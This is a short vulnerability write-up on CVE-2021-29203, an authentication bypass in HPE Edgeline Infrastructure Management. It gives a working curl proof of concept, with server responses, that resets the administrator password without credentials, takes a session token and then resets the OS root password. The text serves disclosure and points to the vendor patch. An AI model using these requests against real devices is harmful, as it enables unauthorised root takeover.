CVE-2021-29203 is an interesting vulnerability that allows an attacker to take advantage of a security feature within HPE Edgeline Infrastructure Management software if you are running any version prior to version 1.22. When setting up the software for the first time the administrator is prompted to reset the default password. This is done by using the following URL:
However this url remains valid even after the password is reset. An unauthenticated attacker can then use the same URL to change the OS root account. This then allows the attacker to login via SSH into the host. Let's take a look at a proof of concept.
First we reset the Administrator password.
curl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/SessionService/ResetPassword/1
{"Messages": [{"MessageID": "Base.1.0.Updated"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.updated"}], "code": "iLO.1.0.ExtendedInfo"}}Next we log in with the new password and get our X-Auth-Token.
curl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"Cygenta"}' https://x.x.x.x/redfish/v1/SessionService/Sessions
HTTP/1.1 201 Created
Server: nginx
Date: Thu, 13 May 2021 23:17:04 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
X-Auth-Token: efb3xxxxxxxxxxxx7f2b
Is-Ldap: False
PasswordReset: False
Location: https://x.x.x.x/redfish/v1/SessionService/Sessions/Administrator16
Cache-Control: no-cache
OData-Version: 4.0
Link: https://x.x.x.x/redfish/v1/SchemaStore/en/SessionCollection.json;rel=describedby
Vary: Accept
Allow: POST, OPTIONS, GET
X-Frame-Options: SAMEORIGIN
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
{"Messages": [{"MessageID": "Base.1.0.Created"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.Created"}], "code": "iLO.1.0.ExtendedInfo"}}Now we can reset both the OS root account and the web application account passwords.
curl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: efb3xxxxxxxxxxxx7f2b' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/AccountService/Accounts/1
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 23:25:18 GMT
Content-Type: application/json
Content-Length: 75
Connection: keep-alive
Vary: Accept, Cookie
Allow: POST, GET, DELETE, OPTIONS, PATCH
X-Frame-Options: SAMEORIGIN
Set-Cookie: sessionid=3xrhw4xxxxxxxxxxxxxxxxxxxx; expires=Thu, 21 April 2021 23:25:18 GMT; HttpOnly; Max-Age=1209600; Path=/; SameSite=Lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
{"Status": "success", "Invalid_Entries": [], "Valid_Entries": ["Password"]}This simple authentication bypass was discovered by the team at Tenable and more information can be found on the NIST website here
HP has already released a software patch for this vulnerability and recommend that it should be applied as soon as possible. For more information and to download the patch visit HP here.